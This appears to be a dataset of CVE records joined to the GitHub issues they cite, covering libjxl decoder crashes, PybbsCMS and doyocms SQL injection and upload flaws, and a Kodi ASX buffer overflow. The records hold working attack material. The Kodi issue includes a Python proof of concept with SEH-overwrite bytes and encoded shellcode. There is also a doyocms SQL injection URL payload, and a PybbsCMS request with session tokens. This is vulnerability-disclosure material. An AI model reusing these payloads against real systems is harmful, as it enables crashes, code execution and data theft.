"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve-coordination@google.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libjxl/libjxl/issues/735"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libjxl/libjxl/pull/757"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libjxl/libjxl/issues/735"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libjxl/libjxl/pull/757"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libjxl_project:libjxl:*:*:*:*:*:*:*:*",
"matchCriteriaId": "32E466AA-7CFB-4240-8AC9-D7394B5D9AEF",
"versionEndExcluding": "0.6.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/libjxl/libjxl/issues/735 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"libjxl",
"libjxl"
] | Hello, this 161 byte JPEG-XL image, found via fuzz testing, causes a segfault during decoding (using the latest commit on the `main` branch).
https://github.com/libjxl/libjxl/files/7348994/fuzz39533.jxl.txt
```
==1086695==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x7fb932913530 (pc 0x00000153da11 bp 0x7fb9343f5bb0 sp 0x7fb9343f5b50 T1086698)
==1086695==The signal is caused by a READ memory access.
#0 0x153da11 in jxl::N_AVX2::(anonymous namespace)::DrawSegment(jxl::SplineSegment const&, bool, unsigned long, long, long, float* restrict*) libjxl/lib/jxl/splines.cc:86:37
#1 0x153c987 in jxl::N_AVX2::(anonymous namespace)::DrawSegments(jxl::Image3<float>*, jxl::Rect const&, jxl::Rect const&, bool, jxl::SplineSegment const*, unsigned long const*, unsigned long const*) libjxl/lib/jxl/splines.cc:151:5
#2 0x15353f5 in void jxl::Splines::Apply<true>(jxl::Image3<float>*, jxl::Rect const&, jxl::Rect const&) const libjxl/lib/jxl/splines.cc:556:5
#3 0x14de591 in jxl::FinalizeImageRect(jxl::Image3<float>*, jxl::Rect const&, std::__1::vector<std::__1::pair<jxl::Plane<float>*, jxl::Rect>, std::__1::allocator<std::__1::pair<jxl::Plane<float>*, jxl::Rect> > > const&, jxl::PassesDecoderState*, unsigned long, jxl::ImageBundle*, jxl::Rect const&) libjxl/lib/jxl/dec_reconstruct.cc:912:28
#4 0x1711d27 in jxl::PassesDecoderState::FinalizeGroup(unsigned long, unsigned long, jxl::Image3<float>*, jxl::ImageBundle*) libjxl/lib/jxl/dec_cache.cc:164:5
#5 0x141bed3 in jxl::N_AVX2::DecodeGroupImpl(jxl::GetBlock*, jxl::GroupDecCache*, jxl::PassesDecoderState*, unsigned long, unsigned long, jxl::ImageBundle*, jxl::DrawMode) libjxl/lib/jxl/dec_group.cc:441:5
#6 0x142fc1e in jxl::DecodeGroup(jxl::BitReader* restrict*, unsigned long, unsigned long, jxl::PassesDecoderState*, jxl::GroupDecCache*, unsigned long, jxl::ImageBundle*, unsigned long, bool, bool) libjxl/lib/jxl/dec_group.cc:754:3
#7 0x14048da in jxl::FrameDecoder::ProcessACGroup(unsigned long, jxl::BitReader* restrict*, unsigned long, unsigned long, bool, bool) libjxl/lib/jxl/dec_frame.cc:579:5
#8 0x140b6ef in operator() libjxl/lib/jxl/dec_frame.cc:744:16
```
It looks like, when drawing spline segments, `segment_y_start` for this image contains 253 entries but `image_rect.y0()` can return higher values for `y` that result in `DrawSegment()` reading beyond the end of this.
https://github.com/libjxl/libjxl/blob/795ba9c3dd45294947d6777910e0ac6e04e59ef4/lib/jxl/splines.cc#L149-L153
The following patch to `Apply()` demonstrates a possible guard to prevent the segfault, but there's almost certainly a better way to fix this.
```diff
--- a/lib/jxl/splines.cc
+++ b/lib/jxl/splines.cc
@@ -552,6 +552,7 @@ template <bool add>
void Splines::Apply(Image3F* const opsin, const Rect& opsin_rect,
const Rect& image_rect) const {
if (segments_.empty()) return;
+ if (image_rect.y0() >= segment_y_start_.size()) return;
for (size_t iy = 0; iy < image_rect.ysize(); iy++) {
HWY_DYNAMIC_DISPATCH(DrawSegments)
(opsin, opsin_rect.Line(iy), image_rect.Line(iy), add, segments_.data(),
```
| splines: segfault due to out of bounds access of segment array | https://api.github.com/repos/libjxl/libjxl/issues/735/comments | 7 | 2021-10-14T20:01:32Z | 2021-11-01T21:54:23Z | https://github.com/libjxl/libjxl/issues/735 | 1,026,770,643 | 735 | 2,734 |
CVE-2021-22564 | 2021-11-01T13:15:07.713 | For certain valid JPEG XL images with a size slightly larger than an integer number of groups (256x256 pixels) when processing the groups out of order the decoder can perform an out of bounds copy of image pixels from an image buffer in the heap to another. This copy can occur when processing the right or bottom edges of the image, but only when groups are processed in certain order. Groups can be processed out of order in multi-threaded decoding environments with heavy thread load but also with images that contain the groups in an arbitrary order in the file. It is recommended to upgrade past 0.6.0 or patch with https://github.com/libjxl/libjxl/pull/775 | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 4.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1,
"impactScore": 3.4,
"source": "cve-coordination@google.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve-coordination@google.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libjxl/libjxl/issues/708"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libjxl/libjxl/pull/775"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libjxl/libjxl/issues/708"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libjxl/libjxl/pull/775"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libjxl_project:libjxl:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7CC7FB7C-9506-45CF-A086-07481ACC16C6",
"versionEndExcluding": null,
"versionEndIncluding": "0.6.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/libjxl/libjxl/issues/708 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libjxl",
"libjxl"
] | Hello,
This crash occurs when a Qt application decode more JXL files at the same time via my [qt-jpegxl-image-plugin](https://github.com/novomesk/qt-jpegxl-image-plugin)
During the crash I see following message:
`/var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/image_ops.h:48: JXL_DASSERT: rect_from.IsInside(from)`
```
#0 jxl::Abort () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/base/status.cc:42
#1 0x00007fffe872f964 in jxl::CopyImageTo<float> () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/image_ops.h:48
#2 0x00007fffe8844075 in LoadBorders () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/dec_cache.cc:110
#3 jxl::PassesDecoderState::FinalizeGroup () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/dec_cache.cc:156
#4 0x00007fffe8863925 in jxl::N_AVX2::DecodeGroupImpl () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/dec_group.cc:441
#5 0x00007fffe886458f in jxl::DecodeGroup () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/dec_group.cc:754
#6 0x00007fffe8848f9d in jxl::FrameDecoder::ProcessACGroup () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/dec_frame.cc:579
#7 0x00007fffe88490d5 in operator() () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/dec_frame.cc:746
#8 CallDataFunc () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/base/data_parallel.h:88
#9 0x00007fffe8a011af in jpegxl::ThreadParallelRunner::RunRange () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/threads/thread_parallel_runner_internal.cc:139
#10 0x00007fffe8a012ab in jpegxl::ThreadParallelRunner::ThreadFunc () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/threads/thread_parallel_runner_internal.cc:169
#11 0x00007ffff72b7e30 in std::execute_native_thread_routine (__p=0x7fffe0005390) at /var/tmp/portage/sys-devel/gcc-10.3.0-r2/work/gcc-10.3.0/libstdc++-v3/src/c++11/thread.cc:80
#12 0x00007ffff7f80e3e in start_thread () from /lib64/libpthread.so.0
#13 0x00007ffff6fd32cf in clone () from /lib64/libc.so.6
```
Here is a simple console application I am able to reproduce crash easily:
[sources.zip](https://github.com/libjxl/libjxl/files/7309663/sources.zip)
How to compile and run:
```
qmake test_crash.pro
make
```
The application decodes bucuresti2.jxl file in two threads (0 - main thread, 1 - worker thread). Each thread have different instance of the plug-in and each plug-in create own ParallelRunner.
It may not crash during first iteration, but sooner or later it crashes. The output may run like this:
```
./test_crash
Iteration: 0
[0] 10916x9985 count:1
[1] 10916x9985 count:1
Iteration: 1
[0] 10916x9985 count:1
[1] 10916x9985 count:1
Iteration: 2
[1] 10916x9985 count:1
/var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/image_ops.h:48: JXL_DASSERT: rect_from.IsInside(from)
Neprípustná inštrukcia
```
Sometime it crashes immediately:
```
Iteration: 0
/var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/image_ops.h:48: JXL_DASSERT: rect_from.IsInside(from)
/var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/image_ops.h:48: JXL_DASSERT: rect_from.IsInside(from)
Neprípustná inštrukcia
```
When just one thread with plug-in is running at a time, there is no crash. | Crash during multiple concurrent/parallel decoding | https://api.github.com/repos/libjxl/libjxl/issues/708/comments | 9 | 2021-10-08T08:45:08Z | 2021-11-01T10:36:28Z | https://github.com/libjxl/libjxl/issues/708 | 1,020,849,009 | 708 | 2,735 |
CVE-2020-28702 | 2021-11-01T14:15:07.607 | A SQL injection vulnerability in TopicMapper.xml of PybbsCMS v5.2.1 allows attackers to access sensitive database information. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tomoya92/pybbs/issues/137"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tomoya92/pybbs/issues/137"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pybbs_project:pybbs:5.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "56EBA5D0-DC5B-453F-85D6-9D65A914C615",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/tomoya92/pybbs/issues/137 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"tomoya92",
"pybbs"
] | Official website of the manufacturer involved: https://17dev.club/
Source code download address: https://github.com/tomoya92/pybbs
Framework version: V5.2.1
Vulnerability type: SQL injection
Vulnerability status: not fixed
Vulnerability level: high
Code analysis and vulnerability recurrence:
As can be seen from screenshot below(see the upper left mark of Figure 1.1 for the detailed code path), the "$" symbol is used in the SQL statement in line 83 of the code, resulting in a possible SQL injection vulnerability. From this SQL section, we trace back to the interface functions, and then we find that the SQL section is the topic query SQL of the user's main interface.

There is no front-end filtering operation in the input box, and the existence of the vulnerability can be verified manually. Start the project, log in the front end after registering users, create a new topic with the content of "1111111" and the title of "test", and then enter 2 in the search bar, and no data can be found.However, enter '2%' or 1 = 1 -- '(including spaces) , proving that there is a SQL injection vulnerability.



Here is the result of sqlmap:


Here is the packet content:

GET /search?keyword=2 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8080/search?keyword=2
Cookie: Idea-54cb6313=611cbcaa-eb60-4866-8b10-8f2fea455b22; Authorization=eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIxIiwiZXhwIjoxNTk5MDE3NzgzLCJ1c2VySWQiOjEsImlhdCI6MTU5ODkzMTM4MywiYWNjb3VudCI6ImFkbWluIiwidXNlcktleSI6Inh4eHgifQ.3MRd8n5x78QuNnClBjWZxc4Y4oplRV6mtBd53m5FghR1ilaqt7FczhIUyryrjRme12TBgwrzI-qGs3eHN5_q4g; JSESSIONID=UMjiO7zbFl9WqWoAVl0PqfFR4PtuQkZBamTULP5y; user_token=b8c937e7-1494-4b7d-bb58-e1442a0d0f74
Upgrade-Insecure-Requests: 1
| SQL injection vulnerability in version 5.2.1 | https://api.github.com/repos/atjiu/pybbs/issues/137/comments | 1 | 2020-11-05T05:58:18Z | 2020-11-05T08:56:51Z | https://github.com/atjiu/pybbs/issues/137 | 736,637,859 | 137 | 2,736 |
CVE-2021-26739 | 2021-11-01T16:15:07.537 | SQL Injection vulnerability in pay.php in millken doyocms 2.3, allows attackers to execute arbitrary code, via the attribute parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/millken/doyocms/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/millken/doyocms/issues/5"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:doyocms_project:doyocms:2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0C51EF13-51B0-4A4B-9CD6-445B7EBE3B57",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/millken/doyocms/issues/5 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"millken",
"doyocms"
] | Compared with the previous injection vulnerability, this vulnerability is more harmful because it can be triggered without logging in to the management account.
The syntax of the cms filter function is wrong, which causes the filter of the array to not take effect

in pay.php:

payload:
http://192.168.0.105/?c=pay&a=cartadd&id=1&quantity=1&attribute[]=123123' or updatexml(2,concat(0x7e,(version())),0) or'

| There is a sqli vulnerability in pay.php,No admin user login required | https://api.github.com/repos/millken/doyocms/issues/5/comments | 0 | 2021-02-01T04:26:10Z | 2021-02-01T04:26:10Z | https://github.com/millken/doyocms/issues/5 | 797,937,862 | 5 | 2,737 |
CVE-2021-26740 | 2021-11-01T16:15:07.590 | Arbitrary file upload vulnerability sysupload.php in millken doyocms 2.3 allows attackers to execute arbitrary code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/millken/doyocms/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/millken/doyocms/issues/4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:doyocms_project:doyocms:2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0C51EF13-51B0-4A4B-9CD6-445B7EBE3B57",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/millken/doyocms/issues/4 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"millken",
"doyocms"
] | in uploads.php
The first line receives the parameter allow, which is passed in when the syUpload object is instantiated, and when the syupload object is constructed, the passed allow is directly used as the allowed suffix dictionary


So when we upload, we only need to add an allow parameter to upload files with any suffix


| Vulnerabilities can be used to upload files of any type | https://api.github.com/repos/millken/doyocms/issues/4/comments | 0 | 2021-02-01T04:18:20Z | 2021-02-01T04:18:20Z | https://github.com/millken/doyocms/issues/4 | 797,934,747 | 4 | 2,738 |
CVE-2021-42917 | 2021-11-01T19:15:07.910 | Buffer overflow vulnerability in Kodi xbmc up to 19.0, allows attackers to cause a denial of service due to improper length of values passed to istream. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fuzzard/xbmc/commit/80c8138c09598e88b4ddb6dbb279fa193bbb3237"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xbmc/xbmc/commit/48730b64494798705d46dfccc4029bd36d072df3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xbmc/xbmc/issues/20305"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xbmc/xbmc/pull/20306"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00009.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fuzzard/xbmc/commit/80c8138c09598e88b4ddb6dbb279fa193bbb3237"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xbmc/xbmc/commit/48730b64494798705d46dfccc4029bd36d072df3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xbmc/xbmc/issues/20305"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xbmc/xbmc/pull/20306"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00009.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kodi:kodi:*:*:*:*:*:*:*:*",
"matchCriteriaId": "91304B46-2581-43C9-A78E-CB9666DF7F3D",
"versionEndExcluding": "19.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/xbmc/xbmc/issues/20305 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"xbmc",
"xbmc"
] | <!--- Please fill out this template to the best of your ability. You can always edit this issue once you have created it. -->
<!--- Read the following link before you create a new problem report: https://kodi.wiki/view/HOW-TO:Submit_a_bug_report -->
## Bug report
### Describe the bug
The attached ASX FILE causes a crash in Kodi v19.0 on Windows 10. To reproduce the issue, the attached file poc.asx can be used. it should crash with an access violation like the following:
Thread 65E4 exit
Thread E18 exit
Thread E14 exit
Breakpoint at 00007FFB6E343005 set!
INT3 breakpoint at ucrtbase.00007FFB6E343005 (00007FFB6E343005)!
000000E0BFF4F7E0 0000000000000000
000000E0BFF4F7E8 00007FFB70C62651 return to ntdll.00007FFB70C62651 from ???
000000E0BFF4F7F0 0000000000000000
000000E0BFF4F7F8 0000000000000000
000000E0BFF4F800 0000000000000000
## Expected Behavior
Should display file type not supported or unable to open file
## Actual Behavior
<!--- Takes hrs to load Kodi and in some case, it crases -->
### To Reproduce
Steps to reproduce the behavior:
firstly, close running kodi application
--------------------------------
head ='''<ASX version="3.0">
<Entry>
<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''
junk = "A" * 1975
nseh ="\x42\x61\x21\x61"
seh ="\xa9\x9e\x41\x00"
adjust="\x30\x83\xc0\x0c"
shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"
"QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"
"KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"
"QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"
"TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"
"HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")
junk_="R"*8000
foot ='''_playlis.wma"/>
</Entry>
</ASX>'''
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
fobj = open("poc.asx","w")
fobj.write(payload)
fobj.close()
---------------------------------------
poc.asx is generated
now open with kodi . it will take hrs to open kodi .on some cases it crash
[poc.zip](https://github.com/xbmc/xbmc/files/7327188/poc.zip)
##Debug
000000E0BFF4D5C8 000000E0BFF4DB90 "¸YK%ö\x7F"
000000E0BFF4D5D0 000000E0BFF4DB00
000000E0BFF4D5D8 000000E0BFF4DB90 "¸YK%ö\x7F"
000000E0BFF4D5E0 000000E0BFF4DA60 &"Error null (0) or unexpected EOF found in input stream."
000000E0BFF4D5E8 00007FF6239DAD4D return to kodi.00007FF6239DAD4D from kodi.00007FF6252B641F
000000E0BFF4D5F0 000000E0BFF4DB90 "¸YK%ö\x7F"
000000E0BFF4D5F8 00007FFB6E34C001 ucrtbase.00007FFB6E34C001
000000E0BFF4D600 0000000000000052
000000E0BFF4D608 000000E0BFF4D900 &"¸YK%ö\x7F"
000000E0BFF4D610 000000000000001E
000000E0BFF4D618 0000000000000000
